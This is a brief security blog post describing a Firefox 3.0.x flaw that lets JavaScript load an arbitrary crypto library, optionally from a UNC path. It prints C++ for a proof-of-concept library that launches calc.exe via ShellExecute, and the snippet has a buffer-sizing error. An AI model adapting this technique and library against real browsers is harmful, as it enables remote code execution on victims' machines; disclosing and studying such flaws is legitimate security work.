Call an arbitrary library with JavaScript? I think i will.

This is a handy way to execute code within the browser. Kudos to Jesse Ruderman and Dan Kaminsky for the bug discovery and POC.

Essentially, in Firefox up through 3.0.13 (my ubuntu 9.04 is running 3.0.11), there’s a publicly exposed javascript function which allows you to call an arbitrary crypto library on the system. Assuming you’re able to place a malicious library (see below) in the target environment, you could use this to get other systems to execute it. Extra win, you can use UNC paths to locate the library 🙂

Source is here. <– note, this is live, but it’s calling a non-existent crypto library.

The malicious library would need a function named CPkunkcsApp(), which, in this case, just calls ShellExecute.

<font face="monospace">CpkunkcsApp::CpkunkcsApp()
    char *str = "c:\\windows\\system32\\calc.exe";
    wchar_t *wText;
    size_t len;
    len = strlen(str)+1;
    wText = new wchar_t[strlen(str)];
    memset(wText, 0, len * sizeof(wchar_t));
    ::MultiByteToWideChar(CP_ACP, NULL, str, -1, wText, len);
    ShellExecute(NULL, NULL, wText, NULL, NULL, SW_SHOW);

Leave a Comment

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s